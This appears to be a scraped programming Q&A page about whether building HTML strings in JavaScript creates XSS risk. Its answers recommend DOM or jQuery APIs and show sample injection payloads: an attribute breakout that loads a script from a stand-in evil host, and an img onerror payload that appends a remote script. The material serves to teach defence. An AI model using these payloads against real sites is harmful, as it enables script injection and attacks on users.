Is it really insecure to build HTML strings in Javascript?

Is it really insecure to build HTML strings in Javascript?

The company who hosts our site reviews our code before deploying – they’ve recently told us this:

HTML strings should never be directly manipulated, as that opens us up
to potential XSS holes. Instead, always use a DOM api to create
elements…that can be jQuery or the direct DOM apis.

For example, instead of
this.html.push( ‘Click to play‘ );

They tell us to do
var quizAuLink = $( ‘a’ );
quizAuLink.addClass( ‘quiz-au’ );
quizAuLink.data( ‘src’, this.au );
quizAu.text( ‘Click to play’ );
quizAu.prepend( ‘‘ );

Is this really true? Can anyone give us an example of an XSS attack that could exploit an HTML string like the first one?

Solutions/Answers:

Solution 1:

If this.au is somehow modified, it might contain something like this:

"><script src="http://example.com/evilScript.js"></script><span class="

That’ll mess up your HTML and inject a script:

<a class="quiz-au" data-src=""><script src="http://example.com/evilScript.js"></script><span class=""><span class="quiz-au-icon"></span>Click to play</a>

If you use DOM manipulation to set the src attribute, the script (or whatever other XSS you use) won’t be executed, as it’ll be properly escaped by the DOM API.

Related:  dynamically set iframe src

In response to some commentators who are saying that if someone could modify this.au, surely they could run the script on their own: I don’t know where this.au is coming from, nor is it particularly relevant. It could be a value from the database, and the DB might have been compromised. It could also be a malicious user trying to mess things up for other users. It could even be an innocent non-techie who didn’t realize that writing "def" > "abc" would destroy things.


One more thing. In the code you provided, var quizAuLink = $( 'a' ); will not create a new <a> element. It’ll just select all the existing ones. You need to use var quizAuLink = $( '<a>' ); to create a new one.

Solution 2:

This should be just as secure, without compromising too much on readability:

var link = $('<a class="quiz-au"><span class="quiz-au-icon"></span>Click to play</a>');
link.data("src", this.au);

The point is to avoid doing string operations to build HTML strings. Note that in above, I used $() only to parse a constant string, which parses to a well known result. In this example, only the this.au part is dangerous because it may contain dynamically calculated values.

Related:  createElement vs. createElementNS

Solution 3:

As you cannot inject script tags in modern browsers using .innerHTML you will need to listen to an event:

If this.au is somehow modified, it might contain something like this:

"><img src="broken-path.png" onerror="alert('my injection');"><span class="

That’ll mess up your HTML and inject a script:

<a class="quiz-au" data-src=""><img src="broken-path.png" onload="alert('my injection')"><span class=""><span class="quiz-au-icon"></span>Click to play</a>

And ofcause to run bigger chunks of JavaScript set onerror to:

var d = document; s = d.createElement('script'); s.type='text/javascript'; s.src = 'www.my-evil-path.com'; d.body.appendChild(s);

Thanks to Scimoster for the boilerplate

Solution 4:

Security aside, when you build HTML in JavaScript you must make sure that it is valid. While it is possible to build and sanitize HTML by string manipulation*, DOM manipulation is far more convenient. Still, you must know exactly which part of your string is HTML and which is literal text.

Consider the following example where we have two hard-coded variables:

var href = "/detail?tag=hr&copy%5B%5D=1",
    text = "The HTML <hr> tag";

The following code naively builds the HTML string:

var div = document.createElement("div");
div.innerHTML = '<a href="' + href + '">' + text + '</a>';
console.log(div.innerHTML);
// <a href="/detail?tag=hr©%5B%5D=1">The HTML <hr> tag</a>

This uses jQuery but it is still incorrect (it uses .html() on a variable that was supposed to be text):

var div = document.createElement("div");
$("<a></a>").attr("href", href).html(text).appendTo(div);
console.log(div.innerHTML);
// <a href="/detail?tag=hr&amp;copy%5B%5D=1">The HTML <hr> tag</a>

This is correct because it displays the text as intended:

var div = document.createElement("div");
$("<a></a>").attr("href", href).text(text).appendTo(div);
console.log(div.innerHTML);
// <a href="/detail?tag=hr&amp;copy%5B%5D=1">The HTML &lt;hr&gt; tag</a>

Conclusion: Using DOM manipulation/jQuery do not guarantee any security, but it sure is one step in right direction.

Related:  Why is Number.MAX_SAFE_INTEGER 9,007,199,254,740,991 and not 9,007,199,254,740,992?

* See this question for examples. Both string and DOM manipulation are discussed.

References